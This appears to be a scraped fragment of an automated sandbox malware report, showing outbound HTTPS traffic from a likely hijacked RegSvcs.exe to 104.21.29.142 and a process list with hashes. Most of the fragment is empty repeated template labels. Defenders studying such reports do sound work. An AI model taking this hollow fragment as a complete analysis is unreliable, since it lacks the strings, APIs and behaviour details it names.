6 | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:29 UTC | 272 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 12307 | OUT | |
2025-01-27 14:58:32 UTC | 1128 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:33 UTC | 263 | OUT | |
2025-01-27 14:58:33 UTC | 81 | OUT | |
2025-01-27 14:58:33 UTC | 1126 | IN | |
2025-01-27 14:58:33 UTC | 54 | IN | |
2025-01-27 14:58:33 UTC | 5 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 09:58:15 |
Start date: | 27/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 09:58:15 |
Start date: | 27/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 09:58:18 |
Start date: | 27/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd60000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 09:58:18 |
Start date: | 27/01/2025 |
Path: | C:\Windows\System32\wermgr.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff73e620000 |
File size: | 229'728 bytes |
MD5 hash: | 74A0194782E039ACE1F7349544DC1CF4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage
Dynamic/Packed Code Coverage
Signature Coverage
Execution Coverage: | 5.9% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 37.3% |
Total number of Nodes: | 295 |
Total number of Limit Nodes: | 27 |
Graph
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|